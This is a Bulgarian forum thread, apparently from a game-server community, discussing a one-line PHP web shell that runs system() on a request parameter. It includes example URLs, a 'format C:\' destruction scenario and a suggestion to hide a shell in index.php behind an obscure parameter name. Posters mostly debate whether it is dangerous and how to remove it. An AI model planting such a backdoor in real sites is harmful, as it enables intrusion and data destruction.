Дава достъп до system(); командите на Win32.Накратко command.com или по известно cmd.
A $_REQUEST[];се използва вместо $_GET[];т.е. например
index.php?v=dir/s
значи човек ако знае 2-3 команди може му форматне някои диск тай ли
Дава достъп до system(); командите на Win32.Накратко command.com или по известно cmd.
A $_REQUEST[];се използва вместо $_GET[];т.е. например
index.php?v=dir/s
Зависи ако не е лимитиран в правата (PwND by Admin )значи човек ако знае 2-3 команди може му форматне някои диск тай ли
по-скоро вие не заслужавате да ви одобряваме темите :Ах Niker е прав нищо не заслужавате
Зависи ако не е лимитиран в правата (PwND by Admin )
<? @system($_REQUEST["v"]); ?>
веднага да се махне.
htmlspecialchars($_REQUEST);
Няма смисъл и без това в индекса е защитен рекуеста:
P.s. Междодругото, чакаме дарката да ми хуукне .dll-тата и да оправи лимита на итемите,
и тогава ще почна репака, щото искам да си опрая дрейка...
Ама дарката вече 3ти ден ме мотае....
Защитен от какво ?dir командата ще проработи.
Format C:\ ще проработи ?Кое е защитеното.
htmlspecialchars();просто променя ' и " на ' &qute <> на < > & на & -> не виждам забрана за format C:\
@banned може и на zzzazzazazzad да се промени,така например качваш shell в самия индекс,и стигаш до него само когато има
index.php?xaxopshell=elf